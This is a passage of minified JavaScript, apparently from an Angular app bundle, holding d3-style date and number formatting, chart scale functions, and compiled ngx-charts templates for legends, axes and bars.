KAe(t,a){return No(1+eT.count(kg(t),t),a,3)}function IU(t,a){return No(t.getMilliseconds(),a,3)}function XAe(t,a){return IU(t,a)+"000"}function YAe(t,a){return No(t.getMonth()+1,a,2)}function JAe(t,a){return No(t.getMinutes(),a,2)}function ZAe(t,a){return No(t.getSeconds(),a,2)}function eTe(t){var a=t.getDay();return 0===a?7:a}function tTe(t,a){return No(tT.count(kg(t)-1,t),a,2)}function RU(t){var a=t.getDay();return a>=4||0===a?a2(t):a2.ceil(t)}function iTe(t,a){return t=RU(t),No(a2.count(kg(t),t)+(4===kg(t).getDay()),a,2)}function aTe(t){return t.getDay()}function nTe(t,a){return No(iT.count(kg(t)-1,t),a,2)}function oTe(t,a){return No(t.getFullYear()%100,a,2)}function rTe(t,a){return No((t=RU(t)).getFullYear()%100,a,2)}function sTe(t,a){return No(t.getFullYear()%1e4,a,4)}function cTe(t,a){var e=t.getDay();return No((t=e>=4||0===e?a2(t):a2.ceil(t)).getFullYear()%1e4,a,4)}function lTe(t){var a=t.getTimezoneOffset();return(a>0?"-":(a*=-1,"+"))+No(a/60|0,"0",2)+No(a%60,"0",2)}function SU(t,a){return No(t.getUTCDate(),a,2)}function dTe(t,a){return No(t.getUTCHours(),a,2)}function mTe(t,a){return No(t.getUTCHours()%12||12,a,2)}function uTe(t,a){return No(1+zI.count(o2(t),t),a,3)}function kU(t,a){return No(t.getUTCMilliseconds(),a,3)}function hTe(t,a){return kU(t,a)+"000"}function fTe(t,a){return No(t.getUTCMonth()+1,a,2)}function pTe(t,a){return No(t.getUTCMinutes(),a,2)}function _Te(t,a){return No(t.getUTCSeconds(),a,2)}function gTe(t){var a=t.getUTCDay();return 0===a?7:a}function CTe(t,a){return No(WI.count(o2(t)-1,t),a,2)}function PU(t){var a=t.getUTCDay();return a>=4||0===a?n2(t):n2.ceil(t)}function yTe(t,a){return t=PU(t),No(n2.count(o2(t),t)+(4===o2(t).getUTCDay()),a,2)}function bTe(t){return t.getUTCDay()}function MTe(t,a){return No(aT.count(o2(t)-1,t),a,2)}function vTe(t,a){return No(t.getUTCFullYear()%100,a,2)}function ATe(t,a){return No((t=PU(t)).getUTCFullYear()%100,a,2)}function TTe(t,a){return No(t.getUTCFullYear()%1e4,a,4)}function ETe(t,a){var e=t.getUTCDay();return No((t=e>=4||0===e?n2(t):n2.ceil(t)).getUTCFullYear()%1e4,a,4)}function DTe(){return"+0000"}function OU(){return"%"}function NU(t){return+t}function LU(t){return Math.floor(+t/1e3)}function WU(t){return null===t?NaN:+t}!function RTe(t){(function xAe(t){var a=t.dateTime,e=t.date,i=t.time,n=t.periods,r=t.days,c=t.shortDays,d=t.months,T=t.shortMonths,k=Fb(n),q=Vb(n),Y=Fb(r),te=Vb(r),pe=Fb(c),Re=Vb(c),Fe=Fb(d),Ne=Vb(d),et=Fb(T),ut=Vb(T),Ze={a:function Pi(Li){return c[Li.getDay()]},A:function Oi(Li){return r[Li.getDay()]},b:function $i(Li){return T[Li.getMonth()]},B:function Na(Li){return d[Li.getMonth()]},c:null,d:wU,e:wU,f:XAe,g:rTe,G:cTe,H:QAe,I:$Ae,j:KAe,L:IU,m:YAe,M:JAe,p:function jn(Li){return n[+(Li.getHours()>=12)]},q:function yn(Li){return 1+~~(Li.getMonth()/3)},Q:NU,s:LU,S:ZAe,u:eTe,U:tTe,V:iTe,w:aTe,W:nTe,x:null,X:null,y:oTe,Y:sTe,Z:lTe,"%":OU},yt={a:function $r(Li){return c[Li.getUTCDay()]},A:function to(Li){return r[Li.getUTCDay()]},b:function rl(Li){return T[Li.getUTCMonth()]},B:function Nl(Li){return d[Li.getUTCMonth()]},c:null,d:SU,e:SU,f:hTe,g:ATe,G:ETe,H:dTe,I:mTe,j:uTe,L:kU,m:fTe,M:pTe,p:function bn(Li){return n[+(Li.getUTCHours()>=12)]},q:function Kr(Li){return 1+~~(Li.getUTCMonth()/3)},Q:NU,s:LU,S:_Te,u:gTe,U:CTe,V:yTe,w:bTe,W:MTe,x:null,X:null,y:vTe,Y:TTe,Z:DTe,"%":OU},It={a:function vi(Li,Fa,Fn){var Si=pe.exec(Fa.slice(Fn));return Si?(Li.w=Re.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},A:function xi(Li,Fa,Fn){var Si=Y.exec(Fa.slice(Fn));return Si?(Li.w=te.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},b:function Za(Li,Fa,Fn){var Si=et.exec(Fa.slice(Fn));return Si?(Li.m=ut.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},B:function wa(Li,Fa,Fn){var Si=Fe.exec(Fa.slice(Fn));return Si?(Li.m=Ne.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},c:function en(Li,Fa,Fn){return oi(Li,a,Fa,Fn)},d:DU,e:DU,f:UAe,g:EU,G:TU,H:xU,I:xU,j:FAe,L:HAe,m:WAe,M:VAe,p:function Ai(Li,Fa,Fn){var Si=k.exec(Fa.slice(Fn));return Si?(Li.p=q.get(Si[0].toLowerCase()),Fn+Si[0].length):-1},q:zAe,Q:GAe,s:jAe,S:BAe,u:kAe,U:PAe,V:OAe,w:SAe,W:NAe,x:function Vo(Li,Fa,Fn){return oi(Li,e,Fa,Fn)},X:function Di(Li,Fa,Fn){return oi(Li,i,Fa,Fn)},y:EU,Y:TU,Z:LAe,"%":qAe};function St(Li,Fa){return function(Fn){var cl,fn,Yr,Si=[],Xr=-1,Jo=0,sl=Li.length;for(Fn instanceof Date||(Fn=new Date(+Fn));++Xr<sl;)37===Li.charCodeAt(Xr)&&(Si.push(Li.slice(Jo,Xr)),null!=(fn=AU[cl=Li.charAt(++Xr)])?cl=Li.charAt(++Xr):fn="e"===cl?" ":"0",(Yr=Fa[cl])&&(cl=Yr(Fn,fn)),Si.push(cl),Jo=Xr+1);return Si.push(Li.slice(Jo,Xr)),Si.join("")}}function Nt(Li,Fa){return function(Fn){var Jo,sl,Si=Wb(1900,void 0,1);if(oi(Si,Li,Fn+="",0)!=Fn.length)return null;if("Q"in Si)return new Date(Si.Q);if("s"in Si)return new Date(1e3*Si.s+("L"in Si?Si.L:0));if(Fa&&!("Z"in Si)&&(Si.Z=0),"p"in Si&&(Si.H=Si.H%12+12*Si.p),void 0===Si.m&&(Si.m="q"in Si?Si.q:0),"V"in Si){if(Si.V<1||Si.V>53)return null;"w"in Si||(Si.w=1),"Z"in Si?(sl=(Jo=BI(Wb(Si.y,0,1))).getUTCDay(),Jo=sl>4||0===sl?aT.ceil(Jo):aT(Jo),Jo=zI.offset(Jo,7*(Si.V-1)),Si.y=Jo.getUTCFullYear(),Si.m=Jo.getUTCMonth(),Si.d=Jo.getUTCDate()+(Si.w+6)%7):(sl=(Jo=VI(Wb(Si.y,0,1))).getDay(),Jo=sl>4||0===sl?iT.ceil(Jo):iT(Jo),Jo=eT.offset(Jo,7*(Si.V-1)),Si.y=Jo.getFullYear(),Si.m=Jo.getMonth(),Si.d=Jo.getDate()+(Si.w+6)%7)}else("W"in Si||"U"in Si)&&("w"in Si||(Si.w="u"in Si?Si.u%7:"W"in Si?1:0),sl="Z"in Si?BI(Wb(Si.y,0,1)).getUTCDay():VI(Wb(Si.y,0,1)).getDay(),Si.m=0,Si.d="W"in Si?(Si.w+6)%7+7*Si.W-(sl+5)%7:Si.w+7*Si.U-(sl+6)%7);return"Z"in Si?(Si.H+=Si.Z/100|0,Si.M+=Si.Z%100,BI(Si)):VI(Si)}}function oi(Li,Fa,Fn,Si){for(var cl,fn,Xr=0,Jo=Fa.length,sl=Fn.length;Xr<Jo;){if(Si>=sl)return-1;if(37===(cl=Fa.charCodeAt(Xr++))){if(cl=Fa.charAt(Xr++),!(fn=It[cl in AU?Fa.charAt(Xr++):cl])||(Si=fn(Li,Fn,Si))<0)return-1}else if(cl!=Fn.charCodeAt(Si++))return-1}return Si}return Ze.x=St(e,Ze),Ze.X=St(i,Ze),Ze.c=St(a,Ze),yt.x=St(e,yt),yt.X=St(i,yt),yt.c=St(a,yt),{format:function(Li){var Fa=St(Li+="",Ze);return Fa.toString=function(){return Li},Fa},parse:function(Li){var Fa=Nt(Li+="",!1);return Fa.toString=function(){return Li},Fa},utcFormat:function(Li){var Fa=St(Li+="",yt);return Fa.toString=function(){return Li},Fa},utcParse:function(Li){var Fa=Nt(Li+="",!0);return Fa.toString=function(){return Li},Fa}}})(t)}({dateTime:"%x, %X",date:"%-m/%-d/%Y",time:"%-I:%M:%S %p",periods:["AM","PM"],days:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],shortDays:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]});const STe=xI(DI).right,VU=(xI(WU),STe);function kTe(t,a){return t=+t,a=+a,function(e){return Math.round(t*(1-e)+a*e)}}function OTe(t){return+t}var BU=[0,1];function s2(t){return t}function HI(t,a){return(a-=t=+t)?function(e){return(e-t)/a}:function PTe(t){return function(){return t}}(isNaN(a)?NaN:.5)}function LTe(t,a,e){var i=t[0],n=t[1],r=a[0],c=a[1];return n<i?(i=HI(n,i),r=e(c,r)):(i=HI(i,n),r=e(r,c)),function(d){return r(i(d))}}function zTe(t,a,e){var i=Math.min(t.length,a.length)-1,n=new Array(i),r=new Array(i),c=-1;for(t[i]<t[0]&&(t=t.slice().reverse(),a=a.slice().reverse());++c<i;)n[c]=HI(t[c],t[c+1]),r[c]=e(a[c],a[c+1]);return function(d){var T=VU(t,d,1,i)-1;return r[T](n[T](d))}}function HU(t,a){return a.domain(t.domain()).range(t.range()).interpolate(t.interpolate()).clamp(t.clamp()).unknown(t.unknown())}function UU(){return function WTe(){var i,n,r,d,T,k,t=BU,a=BU,e=HA,c=s2;function q(){var te=Math.min(t.length,a.length);return c!==s2&&(c=function NTe(t,a){var e;return t>a&&(e=t,t=a,a=e),function(i){return Math.max(t,Math.min(a,i))}}(t[0],t[te-1])),d=te>2?zTe:LTe,T=k=null,Y}function Y(te){return null==te||isNaN(te=+te)?r:(T||(T=d(t.map(i),a,e)))(i(c(te)))}return Y.invert=function(te){return c(n((k||(k=d(a,t.map(i),Rm)))(te)))},Y.domain=function(te){return arguments.length?(t=Array.from(te,OTe),q()):t.slice()},Y.range=function(te){return arguments.length?(a=Array.from(te),q()):a.slice()},Y.rangeRound=function(te){return a=Array.from(te),e=kTe,q()},Y.clamp=function(te){return arguments.length?(c=!!te||s2,q()):c!==s2},Y.interpolate=function(te){return arguments.length?(e=te,q()):e},Y.unknown=function(te){return arguments.length?(r=te,Y):r},function(te,pe){return i=te,n=pe,q()}}()(s2,s2)}function Bb(t,a){switch(arguments.length){case 0:break;case 1:this.range(t);break;default:this.range(a).domain(t)}return this}var GU,UTe=/^(?:(.)?([<>=^]))?([+\-( ])?([$#])?(0)?(\d+)?(,)?(\.\d+)?(~)?([a-z%])?$/i;function nT(t){if(!(a=UTe.exec(t)))throw new Error("invalid format: "+t);var a;return new UI({fill:a[1],align:a[2],sign:a[3],symbol:a[4],zero:a[5],width:a[6],comma:a[7],precision:a[8]&&a[8].slice(1),trim:a[9],type:a[10]})}function UI(t){this.fill=void 0===t.fill?" ":t.fill+"",this.align=void 0===t.align?">":t.align+"",this.sign=void 0===t.sign?"-":t.sign+"",this.symbol=void 0===t.symbol?"":t.symbol+"",this.zero=!!t.zero,this.width=void 0===t.width?void 0:+t.width,this.comma=!!t.comma,this.precision=void 0===t.precision?void 0:+t.precision,this.trim=!!t.trim,this.type=void 0===t.type?"":t.type+""}function oT(t,a){if((e=(t=a?t.toExponential(a-1):t.toExponential()).indexOf("e"))<0)return null;var e,i=t.slice(0,e);return[i.length>1?i[0]+i.slice(2):i,+t.slice(e+1)]}function c2(t){return(t=oT(Math.abs(t)))?t[1]:NaN}function jU(t,a){var e=oT(t,a);if(!e)return t+"";var i=e[0],n=e[1];return n<0?"0."+new Array(-n).join("0")+i:i.length>n+1?i.slice(0,n+1)+"."+i.slice(n+1):i+new Array(n-i.length+2).join("0")}nT.prototype=UI.prototype,UI.prototype.toString=function(){return this.fill+this.align+this.sign+this.symbol+(this.zero?"0":"")+(void 0===this.width?"":Math.max(1,0|this.width))+(this.comma?",":"")+(void 0===this.precision?"":"."+Math.max(0,0|this.precision))+(this.trim?"~":"")+this.type};const QU={"%":(t,a)=>(100*t).toFixed(a),b:t=>Math.round(t).toString(2),c:t=>t+"",d:function qTe(t){return Math.abs(t=Math.round(t))>=1e21?t.toLocaleString("en").replace(/,/g,""):t.toString(10)},e:(t,a)=>t.toExponential(a),f:(t,a)=>t.toFixed(a),g:(t,a)=>t.toPrecision(a),o:t=>Math.round(t).toString(8),p:(t,a)=>jU(100*t,a),r:jU,s:function KTe(t,a){var e=oT(t,a);if(!e)return t+"";var i=e[0],n=e[1],r=n-(GU=3*Math.max(-8,Math.min(8,Math.floor(n/3))))+1,c=i.length;return r===c?i:r>c?i+new Array(r-c+1).join("0"):r>0?i.slice(0,r)+"."+i.slice(r):"0."+new Array(1-r).join("0")+oT(t,Math.max(0,a+r-1))[0]},X:t=>Math.round(t).toString(16).toUpperCase(),x:t=>Math.round(t).toString(16)};function $U(t){return t}var rT,YU,JU,KU=Array.prototype.map,XU=["y","z","a","f","p","n","\xb5","m","","k","M","G","T","P","E","Z","Y"];function tEe(t){var a=t.domain;return t.ticks=function(e){var i=a();return function uAe(t,a,e){var i,r,c,d,n=-1;if(e=+e,(t=+t)==(a=+a)&&e>0)return[t];if((i=a<t)&&(r=t,t=a,a=r),0===(d=cU(t,a,e))||!isFinite(d))return[];if(d>0){let T=Math.round(t/d),k=Math.round(a/d);for(T*d<t&&++T,k*d>a&&--k,c=new Array(r=k-T+1);++n<r;)c[n]=(T+n)*d}else{d=-d;let T=Math.round(t*d),k=Math.round(a*d);for(T/d<t&&++T,k/d>a&&--k,c=new Array(r=k-T+1);++n<r;)c[n]=(T+n)/d}return i&&c.reverse(),c}(i[0],i[i.length-1],null==e?10:e)},t.tickFormat=function(e,i){var n=a();return function eEe(t,a,e,i){var r,n=SI(t,a,e);switch((i=nT(null==i?",f":i)).type){case"s":var c=Math.max(Math.abs(t),Math.abs(a));return null==i.precision&&!isNaN(r=function GTe(t,a){return Math.max(0,3*Math.max(-8,Math.min(8,Math.floor(c2(a)/3)))-c2(Math.abs(t)))}(n,c))&&(i.precision=r),JU(i,c);case"":case"e":case"g":case"p":case"r":null==i.precision&&!isNaN(r=function JTe(t,a){return t=Math.abs(t),a=Math.abs(a)-t,Math.max(0,c2(a)-c2(t))+1}(n,Math.max(Math.abs(t),Math.abs(a))))&&(i.precision=r-("e"===i.type));break;case"f":case"%":null==i.precision&&!isNaN(r=function ZTe(t){return Math.max(0,-c2(Math.abs(t)))}(n))&&(i.precision=r-2*("%"===i.type))}return YU(i)}(n[0],n[n.length-1],null==e?10:e,i)},t.nice=function(e){null==e&&(e=10);var T,k,i=a(),n=0,r=i.length-1,c=i[n],d=i[r],q=10;for(d<c&&(k=c,c=d,d=k,k=n,n=r,r=k);q-- >0;){if((k=cU(c,d,e))===T)return i[n]=c,i[r]=d,a(i);if(k>0)c=Math.floor(c/k)*k,d=Math.ceil(d/k)*k;else{if(!(k<0))break;c=Math.ceil(c*k)/k,d=Math.floor(d*k)/k}T=k}return t},t}function l2(){var t=UU();return t.copy=function(){return HU(t,l2())},Bb.apply(t,arguments),tEe(t)}function ZU(t,a,e){t=+t,a=+a,e=(n=arguments.length)<2?(a=t,t=0,1):n<3?1:+e;for(var i=-1,n=0|Math.max(0,Math.ceil((a-t)/e)),r=new Array(n);++i<n;)r[i]=t+i*e;return r}!function YTe(t){rT=function XTe(t){var a=void 0===t.grouping||void 0===t.thousands?$U:function jTe(t,a){return function(e,i){for(var n=e.length,r=[],c=0,d=t[0],T=0;n>0&&d>0&&(T+d+1>i&&(d=Math.max(1,i-T)),r.push(e.substring(n-=d,n+d)),!((T+=d+1)>i));)d=t[c=(c+1)%t.length];return r.reverse().join(a)}}(KU.call(t.grouping,Number),t.thousands+""),e=void 0===t.currency?"":t.currency[0]+"",i=void 0===t.currency?"":t.currency[1]+"",n=void 0===t.decimal?".":t.decimal+"",r=void 0===t.numerals?$U:function QTe(t){return function(a){return a.replace(/[0-9]/g,function(e){return t[+e]})}}(KU.call(t.numerals,String)),c=void 0===t.percent?"%":t.percent+"",d=void 0===t.minus?"\u2212":t.minus+"",T=void 0===t.nan?"NaN":t.nan+"";function k(Y){var te=(Y=nT(Y)).fill,pe=Y.align,Re=Y.sign,Fe=Y.symbol,Ne=Y.zero,et=Y.width,ut=Y.comma,Ze=Y.precision,yt=Y.trim,It=Y.type;"n"===It?(ut=!0,It="g"):QU[It]||(void 0===Ze&&(Ze=12),yt=!0,It="g"),(Ne||"0"===te&&"="===pe)&&(Ne=!0,te="0",pe="=");var St="$"===Fe?e:"#"===Fe&&/[boxX]/.test(It)?"0"+It.toLowerCase():"",Nt="$"===Fe?i:/[%p]/.test(It)?c:"",oi=QU[It],Ai=/[defgprs%]/.test(It);function vi(xi){var en,Vo,Di,Za=St,wa=Nt;if("c"===It)wa=oi(xi)+wa,xi="";else{var Pi=(xi=+xi)<0||1/xi<0;if(xi=isNaN(xi)?T:oi(Math.abs(xi),Ze),yt&&(xi=function $Te(t){e:for(var n,a=t.length,e=1,i=-1;e<a;++e)switch(t[e]){case".":i=n=e;break;case"0":0===i&&(i=e),n=e;break;default:if(!+t[e])break e;i>0&&(i=0)}return i>0?t.slice(0,i)+t.slice(n+1):t}(xi)),Pi&&0==+xi&&"+"!==Re&&(Pi=!1),Za=(Pi?"("===Re?Re:d:"-"===Re||"("===Re?"":Re)+Za,wa=("s"===It?XU[8+GU/3]:"")+wa+(Pi&&"("===Re?")":""),Ai)for(en=-1,Vo=xi.length;++en<Vo;)if(48>(Di=xi.charCodeAt(en))||Di>57){wa=(46===Di?n+xi.slice(en+1):xi.slice(en))+wa,xi=xi.slice(0,en);break}}ut&&!Ne&&(xi=a(xi,1/0));var Oi=Za.length+xi.length+wa.length,$i=Oi<et?new Array(et-Oi+1).join(te):"";switch(ut&&Ne&&(xi=a($i+xi,$i.length?et-wa.length:1/0),$i=""),pe){case"<":xi=Za+xi+wa+$i;break;case"=":xi=Za+$i+xi+wa;break;case"^":xi=$i.slice(0,Oi=$i.length>>1)+Za+xi+wa+$i.slice(Oi);break;default:xi=$i+Za+xi+wa}return r(xi)}return Ze=void 0===Ze?6:/[gprs]/.test(It)?Math.max(1,Math.min(21,Ze)):Math.max(0,Math.min(20,Ze)),vi.toString=function(){return Y+""},vi}return{format:k,formatPrefix:function q(Y,te){var pe=k(((Y=nT(Y)).type="f",Y)),Re=3*Math.max(-8,Math.min(8,Math.floor(c2(te)/3))),Fe=Math.pow(10,-Re),Ne=XU[8+Re/3];return function(et){return pe(Fe*et)+Ne}}}}(t),YU=rT.format,JU=rT.formatPrefix}({thousands:",",grouping:[3],currency:["$",""]});const eq=Symbol("implicit");function qI(){var t=new Map,a=[],e=[],i=eq;function n(r){var c=r+"",d=t.get(c);if(!d){if(i!==eq)return i;t.set(c,d=a.push(r))}return e[(d-1)%e.length]}return n.domain=function(r){if(!arguments.length)return a.slice();a=[],t=new Map;for(const c of r){const d=c+"";t.has(d)||t.set(d,a.push(c))}return n},n.range=function(r){return arguments.length?(e=Array.from(r),n):e.slice()},n.unknown=function(r){return arguments.length?(i=r,n):i},n.copy=function(){return qI(a,e).unknown(i)},Bb.apply(n,arguments),n}function sT(){var r,c,t=qI().unknown(void 0),a=t.domain,e=t.range,i=0,n=1,d=!1,T=0,k=0,q=.5;function Y(){var te=a().length,pe=n<i,Re=pe?n:i,Fe=pe?i:n;r=(Fe-Re)/Math.max(1,te-T+2*k),d&&(r=Math.floor(r)),Re+=(Fe-Re-r*(te-T))*q,c=r*(1-T),d&&(Re=Math.round(Re),c=Math.round(c));var Ne=ZU(te).map(function(et){return Re+r*et});return e(pe?Ne.reverse():Ne)}return delete t.unknown,t.domain=function(te){return arguments.length?(a(te),Y()):a()},t.range=function(te){return arguments.length?([i,n]=te,i=+i,n=+n,Y()):[i,n]},t.rangeRound=function(te){return[i,n]=te,i=+i,n=+n,d=!0,Y()},t.bandwidth=function(){return c},t.step=function(){return r},t.round=function(te){return arguments.length?(d=!!te,Y()):d},t.padding=function(te){return arguments.length?(T=Math.min(1,k=+te),Y()):T},t.paddingInner=function(te){return arguments.length?(T=Math.min(1,te),Y()):T},t.paddingOuter=function(te){return arguments.length?(k=+te,Y()):k},t.align=function(te){return arguments.length?(q=Math.max(0,Math.min(1,te)),Y()):q},t.copy=function(){return sT(a(),[i,n]).round(d).paddingInner(T).paddingOuter(k).align(q)},Bb.apply(Y(),arguments)}function aEe(t,a,e=WU){if(i=t.length){if((a=+a)<=0||i<2)return+e(t[0],0,t);if(a>=1)return+e(t[i-1],i-1,t);var i,n=(i-1)*a,r=Math.floor(n),c=+e(t[r],r,t);return c+(+e(t[r+1],r+1,t)-c)*(n-r)}}function iq(){var i,t=[],a=[],e=[];function n(){var c=0,d=Math.max(1,a.length);for(e=new Array(d-1);++c<d;)e[c-1]=aEe(t,c/d);return r}function r(c){return null==c||isNaN(c=+c)?i:a[VU(e,c)]}return r.invertExtent=function(c){var d=a.indexOf(c);return d<0?[NaN,NaN]:[d>0?e[d-1]:t[0],d<e.length?e[d]:t[t.length-1]]},r.domain=function(c){if(!arguments.length)return t.slice();t=[];for(let d of c)null!=d&&!isNaN(d=+d)&&t.push(d);return t.sort(DI),n()},r.range=function(c){return arguments.length?(a=Array.from(c),n()):a.slice()},r.unknown=function(c){return arguments.length?(i=c,r):i},r.quantiles=function(){return e.slice()},r.copy=function(){return iq().domain(t).range(a).unknown(i)},Bb.apply(r,arguments)}de(4730);const nEe=["caretElm"];function oEe(t,a){}const rEe=function(t){return{model:t}};function sEe(t,a){if(1&t&&(m(0,"span"),ne(1,oEe,0,0,"ng-template",5),u()),2&t){const e=B();C(1),V("ngTemplateOutlet",e.template)("ngTemplateOutletContext",fr(2,rEe,e.context))}}function cEe(t,a){1&t&&it(0,"span",6),2&t&&V("innerHTML",B().title,Hc)}function lEe(t,a){if(1&t&&(m(0,"header",4)(1,"span",5),s(2),u()()),2&t){const e=B();C(2),ke(e.title)}}function dEe(t,a){if(1&t){const e=Ye();m(0,"li",6)(1,"ngx-charts-legend-entry",7),he("select",function(n){return be(e),Me(B().labelClick.emit(n))})("activate",function(n){return be(e),Me(B().activate(n))})("deactivate",function(n){return be(e),Me(B().deactivate(n))}),u()()}if(2&t){const e=a.$implicit,i=B();C(1),V("label",e.label)("formattedLabel",e.formattedLabel)("color",e.color)("isActive",i.isActive(e))}}function mEe(t,a){if(1&t&&(fi(),ln(),it(0,"ngx-charts-scale-legend",4)),2&t){const e=B();V("horizontal",e.legendOptions&&e.legendOptions.position===e.LegendPosition.Below)("valueRange",e.legendOptions.domain)("colors",e.legendOptions.colors)("height",e.view[1])("width",e.legendWidth)}}function uEe(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"ngx-charts-legend",5),he("labelClick",function(n){return be(e),Me(B().legendLabelClick.emit(n))})("labelActivate",function(n){return be(e),Me(B().legendLabelActivate.emit(n))})("labelDeactivate",function(n){return be(e),Me(B().legendLabelDeactivate.emit(n))}),u()}if(2&t){const e=B();V("horizontal",e.legendOptions&&e.legendOptions.position===e.LegendPosition.Below)("data",e.legendOptions.domain)("title",e.legendOptions.title)("colors",e.legendOptions.colors)("height",e.view[1])("width",e.legendWidth)("activeEntries",e.activeEntries)}}const aq=["*"],hEe=["ngx-charts-axis-label",""],nq=["ticksel"],fEe=["ngx-charts-x-axis-ticks",""];function pEe(t,a){if(1&t&&(fi(),m(0,"g",3)(1,"title"),s(2),u(),m(3,"text",4),s(4),u()()),2&t){const e=a.$implicit,i=B();Rt("transform",i.tickTransform(e)),C(2),ke(i.tickFormat(e)),C(1),ri("font-size","12px"),Rt("text-anchor",i.textAnchor)("transform",i.textTransform),C(1),ct(" ",i.tickTrim(i.tickFormat(e))," ")}}function _Ee(t,a){if(1&t&&(fi(),m(0,"g"),it(1,"line",6),u()),2&t){const e=B(2);Rt("transform",e.gridLineTransform()),C(1),Rt("y1",-e.gridLineHeight)}}function gEe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,_Ee,2,2,"g",5),u()),2&t){const e=a.$implicit,i=B();Rt("transform",i.tickTransform(e)),C(1),V("ngIf",i.showGridLines)}}const CEe=["ngx-charts-x-axis",""];function yEe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("dimensionsChanged",function(n){return be(e),Me(B().emitTicksHeight(n))}),u()}if(2&t){const e=B();V("trimTicks",e.trimTicks)("rotateTicks",e.rotateTicks)("maxTickLength",e.maxTickLength)("tickFormatting",e.tickFormatting)("tickArguments",e.tickArguments)("tickStroke",e.tickStroke)("scale",e.xScale)("orient",e.xOrient)("showGridLines",e.showGridLines)("gridLineHeight",e.dims.height)("width",e.dims.width)("tickValues",e.ticks)}}function bEe(t,a){if(1&t&&(fi(),it(0,"g",3)),2&t){const e=B();V("label",e.labelText)("offset",e.labelOffset)("orient",e.orientation.Bottom)("height",e.dims.height)("width",e.dims.width)}}const MEe=["ngx-charts-y-axis-ticks",""];function vEe(t,a){if(1&t&&(fi(),m(0,"g",4)(1,"title"),s(2),u(),m(3,"text",5),s(4),u()()),2&t){const e=a.$implicit,i=B();Rt("transform",i.transform(e)),C(2),ke(i.tickFormat(e)),C(1),ri("font-size","12px"),Rt("dy",i.dy)("x",i.x1)("y",i.y1)("text-anchor",i.textAnchor),C(1),ct(" ",i.tickTrim(i.tickFormat(e))," ")}}function AEe(t,a){if(1&t&&(fi(),it(0,"path",6)),2&t){const e=B();Rt("d",e.referenceAreaPath)("transform",e.gridLineTransform())}}function TEe(t,a){1&t&&(fi(),it(0,"line",9)),2&t&&Rt("x2",B(3).gridLineWidth)}function EEe(t,a){1&t&&(fi(),it(0,"line",9)),2&t&&Rt("x2",-B(3).gridLineWidth)}function DEe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,TEe,1,1,"line",8),ne(2,EEe,1,1,"line",8),u()),2&t){const e=B(2);Rt("transform",e.gridLineTransform()),C(1),V("ngIf",e.orient===e.Orientation.Left),C(1),V("ngIf",e.orient===e.Orientation.Right)}}function xEe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,DEe,3,3,"g",7),u()),2&t){const e=a.$implicit,i=B();Rt("transform",i.transform(e)),C(1),V("ngIf",i.showGridLines)}}function wEe(t,a){if(1&t&&(fi(),m(0,"g")(1,"title"),s(2),u(),m(3,"text",11),s(4),u()()),2&t){const e=B(2).$implicit,i=B();C(2),ke(i.tickTrim(i.tickFormat(e.value))),C(1),Rt("dy",i.dy)("y",-6)("x",i.gridLineWidth)("text-anchor",i.textAnchor),C(1),ct(" ",e.name," ")}}function IEe(t,a){if(1&t&&(fi(),m(0,"g"),it(1,"line",10),ne(2,wEe,5,6,"g",7),u()),2&t){const e=B().$implicit,i=B();Rt("transform",i.transform(e.value)),C(1),Rt("x2",i.gridLineWidth)("transform",i.gridLineTransform()),C(1),V("ngIf",i.showRefLabels)}}function REe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,IEe,3,4,"g",7),u()),2&t){const e=B();C(1),V("ngIf",e.showRefLines)}}const SEe=["ngx-charts-y-axis",""];function kEe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("dimensionsChanged",function(n){return be(e),Me(B().emitTicksWidth(n))}),u()}if(2&t){const e=B();V("trimTicks",e.trimTicks)("maxTickLength",e.maxTickLength)("tickFormatting",e.tickFormatting)("tickArguments",e.tickArguments)("tickValues",e.ticks)("tickStroke",e.tickStroke)("scale",e.yScale)("orient",e.yOrient)("showGridLines",e.showGridLines)("gridLineWidth",e.dims.width)("referenceLines",e.referenceLines)("showRefLines",e.showRefLines)("showRefLabels",e.showRefLabels)("height",e.dims.height)}}function PEe(t,a){if(1&t&&(fi(),it(0,"g",3)),2&t){const e=B();V("label",e.labelText)("offset",e.labelOffset)("orient",e.yOrient)("height",e.dims.height)("width",e.dims.width)}}const OEe=["ngx-charts-svg-linear-gradient",""];function NEe(t,a){if(1&t&&(fi(),it(0,"stop")),2&t){const e=a.$implicit;ri("stop-color",e.color)("stop-opacity",e.opacity),Rt("offset",e.offset+"%")}}const cDe=["tooltipTemplate"],Hb=function(t,a){return[t,a]},_De=["ngx-charts-bar",""];function gDe(t,a){if(1&t&&(fi(),m(0,"defs"),it(1,"g",2),u()),2&t){const e=B();C(1),V("orientation",e.orientation)("name",e.gradientId)("stops",e.gradientStops)}}const CDe=["ngx-charts-bar-label",""],DDe=["ngx-charts-series-vertical",""];function xDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("select",function(n){return be(e),Me(B(2).onClick(n))})("activate",function(n){return be(e),Me(B(2).activate.emit(n))})("deactivate",function(n){return be(e),Me(B(2).deactivate.emit(n))}),u()}if(2&t){const e=a.$implicit,i=B(2);V("@animationState","active")("@.disabled",!i.animations)("width",e.width)("height",e.height)("x",e.x)("y",e.y)("fill",e.color)("stops",e.gradientStops)("data",e.data)("orientation",i.barOrientation.Vertical)("roundEdges",e.roundEdges)("gradient",i.gradient)("ariaLabel",e.ariaLabel)("isActive",i.isActive(e.data))("tooltipDisabled",i.tooltipDisabled)("tooltipPlacement",i.tooltipPlacement)("tooltipType",i.tooltipType)("tooltipTitle",i.tooltipTemplate?void 0:e.tooltipText)("tooltipTemplate",i.tooltipTemplate)("tooltipContext",e.data)("noBarWhenZero",i.noBarWhenZero)("animations",i.animations)}}function 